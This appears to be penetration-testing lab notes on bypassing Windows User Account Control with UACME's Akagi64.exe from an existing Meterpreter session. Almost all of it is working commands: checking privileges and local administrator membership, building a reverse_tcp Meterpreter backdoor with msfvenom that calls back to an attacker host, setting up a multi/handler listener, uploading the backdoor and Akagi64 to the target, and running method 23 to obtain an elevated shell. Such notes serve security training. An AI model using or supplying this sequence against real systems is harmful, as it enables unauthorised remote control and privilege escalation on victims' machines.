UAC Bypass Akagai64.exe

Get a meterpreter session on the target and follow the below techinique:-

getprivs
    Enabled Process Privileges
    ==========================
    Name
    ----
    SeChangeNotifyPrivilege
    SeIncreaseWorkingSetPrivilege
    SeShutdownPrivilege
    SeTimeZonePrivilege
    SeUndockPrivilege

• Verify if admin user is part of the local administrators group

shell
net user
net localgroup administrators

    Alias name   administrators
    Comment   Administrators have complete and unrestricted access to the computer/domain
    Members
    -------------------------------------------------------------------------------
    admin
    Administrator
# "admin" user is a local administrator

• In order to run programs or tasks with elevated privileges, UAC bypass is necessary

#UAC Bypass & Privesc

ls /root/Desktop/tools/UACME/
	Akagi64.exe

• Generate a meterpreter payload with msfvenom

ip -br -c a
	eth1@if162568  UP  10.10.4.2/24

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.4.2 LPORT=1234 -f exe > backdoor.exe

• Set up a new msfconsole session and set up a listener with multi/handler, to receive the connection one the payload is executed on the target

  • set the payload used with msfvenom - the windows/meterpreter/reverse_tcp one

  • set the LHOST IP and LPORT of the attack machine, based on the msfvenom generated payload

msfconsole -q

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.4.2
set LPORT 1234
run

• The reverse_tcp handler is listening and ready to receive the connection from the malicious payload

• Head back in the meterpreter session already opened

cd C:\\
mkdir Temp
cd Temp
# or use
# cd C:\\Users\\admin\\AppData\\Local\\Temp

upload /root/backdoor.exe
upload /root/Desktop/tools/UACME/Akagi64.exe

• UAC would prevent running backdoor.exe

• Run Akagi64.exe executable with UACMe methor 23

Akagi64.exe 23 C:\Temp\backdoor.exe

• Elevated meterpreter session should be received on the listener